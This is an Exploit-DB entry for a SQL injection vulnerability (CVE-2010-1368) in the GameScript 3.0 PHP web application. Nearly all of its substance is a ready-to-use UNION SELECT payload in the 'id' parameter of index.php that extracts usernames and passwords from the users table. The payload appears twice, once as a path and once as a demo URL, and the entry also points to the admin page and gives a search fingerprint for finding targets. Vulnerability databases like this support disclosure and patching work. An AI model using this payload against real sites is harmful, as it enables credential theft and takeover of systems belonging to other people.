GameScript 3.0 - SQL Injection

EDB-ID:

11577

CVE:

2010-1368

EDB Verified:

Author:

FormatXformat

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-25

Vulnerable App:

Author :  FormatXformat
Home : Tkurd.net

Script : http://www.gamescript.net
Vulnerabilities : SQL Injection


Dork:

Copyright © 2005 - 2006 GameScript.net. All Games Copyright © To Their Respective Owners. All Rights Reserved.



Exploit:

/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--

Admin page: admincp



Demo :

http://server/index.php?action=category&id=-6+union+all+select+1,concat(username,0x3a,password),3+from+users--

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services